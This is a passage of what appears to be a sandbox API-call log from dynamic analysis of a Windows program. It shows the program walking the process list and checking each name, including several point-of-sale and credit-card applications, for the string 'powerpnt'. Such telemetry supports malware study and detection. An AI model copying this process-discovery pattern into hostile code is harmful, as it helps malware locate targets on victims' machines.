lpUsedDefaultChar=0x0) returned 13 [0099.023] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3578d08 [0099.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x3578d08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0099.023] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0099.024] StrStrIA (lpFirst="whatsapp.exe", lpSrch="powerpnt") returned 0x0 [0099.024] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0099.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.025] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3578d20 [0099.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x3578d20, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0099.025] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0099.025] StrStrIA (lpFirst="winscp.exe", lpSrch="powerpnt") returned 0x0 [0099.025] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0099.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0099.026] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357a158 [0099.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x357a158, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0099.026] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0099.026] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="powerpnt") returned 0x0 [0099.026] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0099.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0099.028] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357a298 [0099.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x357a298, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0099.028] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0099.028] StrStrIA (lpFirst="active-charge.exe", lpSrch="powerpnt") returned 0x0 [0099.028] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0099.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.029] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578ee8 [0099.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x3578ee8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0099.029] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0099.029] StrStrIA (lpFirst="accupos.exe", lpSrch="powerpnt") returned 0x0 [0099.029] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0099.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.031] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3578d38 [0099.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x3578d38, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0099.031] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0099.031] StrStrIA (lpFirst="afr38.exe", lpSrch="powerpnt") returned 0x0 [0099.031] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0099.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.032] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3578d50 [0099.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x3578d50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0099.032] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0099.032] StrStrIA (lpFirst="aldelo.exe", lpSrch="powerpnt") returned 0x0 [0099.033] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0099.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0099.034] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x357b418 [0099.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x357b418, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0099.035] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0099.035] StrStrIA (lpFirst="ccv_server.exe", lpSrch="powerpnt") returned 0x0 [0099.035] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0099.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0099.036] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x357a278 [0099.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x357a278, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0099.037] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0099.037] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="powerpnt") returned 0x0 [0099.037] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0099.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0099.038] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357a1d8 [0099.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x357a1d8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0099.038] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0099.038] StrStrIA (lpFirst="creditservice.exe", lpSrch="powerpnt") returned 0x0 [0099.038] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0099.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.039] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357b5f8 [0099.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x357b5f8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0099.039] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0099.040] StrStrIA (lpFirst="edcsvr.exe", lpSrch="powerpnt") returned 0x0 [0099.040] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0099.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0099.041] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x357b4d8 [0099.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x357b4d8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0099.041] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0099.041] StrStrIA (lpFirst="fpos.exe", lpSrch="powerpnt") returned 0x0 [0099.041] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0099.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.042] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357b538 [0099.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x357b538, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0099.042] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0099.042] StrStrIA (lpFirst="isspos.exe", lpSrch="powerpnt") returned 0x0 [0099.043] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0099.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0099.044] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357a2b8 [0099.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x357a2b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0099.044] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0099.044] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="powerpnt") returned 0x0 [0099.044] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0099.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.045] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357b628 [0099.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x357b628, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0099.045] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0099.045] StrStrIA (lpFirst="omnipos.exe", lpSrch="powerpnt") returned 0x0 [0099.045] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0099.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.047] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357b430 [0099.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x357b430, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0099.047] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0099.047] StrStrIA (lpFirst="spcwin.exe", lpSrch="powerpnt") returned 0x0 [0099.047] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0099.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0099.048] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x357a178 [0099.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x357a178, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0099.048] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0099.048] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="powerpnt") returned 0x0 [0099.048] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0099.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0099.050] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x357b658 [0099.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x357b658, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0099.050] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0099.050] StrStrIA (lpFirst="utg2.exe", lpSrch="powerpnt") returned 0x0 [0099.050] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0099.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.051] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357b580 [0099.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x357b580, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0099.052] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0099.052] StrStrIA (lpFirst="saying.exe", lpSrch="powerpnt") returned 0x0 [0099.052] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0099.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0099.053] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x357b610 [0099.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x357b610, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0099.053] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0099.053] StrStrIA (lpFirst="ripe.exe", lpSrch="powerpnt") returned 0x0 [0099.053] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0099.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.054] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357b448 [0099.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x357b448, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0099.054] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0099.054] StrStrIA (lpFirst="acoustic.exe", lpSrch="powerpnt") returned 0x0 [0099.054] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0099.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0099.056] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x357b6a0 [0099.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x357b6a0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0099.056] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0099.056] StrStrIA (lpFirst="mail.exe", lpSrch="powerpnt") returned 0x0 [0099.056] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0099.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.057] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357b5c8 [0099.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x357b5c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0099.057] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0099.057] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="powerpnt") returned 0x0 [0099.057] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 